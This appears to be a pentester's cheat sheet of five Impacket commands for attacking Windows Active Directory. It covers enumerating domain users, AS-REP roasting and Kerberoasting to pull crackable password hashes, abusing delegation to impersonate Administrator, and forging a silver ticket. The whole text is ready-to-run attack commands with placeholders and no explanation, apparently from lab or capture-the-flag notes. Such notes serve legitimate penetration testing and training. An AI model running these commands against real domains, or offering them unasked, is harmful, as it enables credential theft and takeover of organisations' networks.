GetADUsers.py -dc-ip 10.10.10.248 -all domain.local/user
Python GetNPUsers.py <domain_name>/<Domain_user>:<domain_Pass> -usersfile users.txt -format <hashcat | john>
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> -request
getSTS.py domain.local/SVC -spn WWW/dc.domain.local -hashes <HASH> -impersonate Administrator
ticketer.py -spn "spn/DC.DOMAIN.LOCAL" -user "USER" -password "PASSWORD" -nthash "NTHASH-USECYBERCHEF" -domain DOMAIN.LOCAL -domain-sid "DOMAIN-OBJECT-SID" -dc-ip DC.DOMAIN.LOCAL Administrator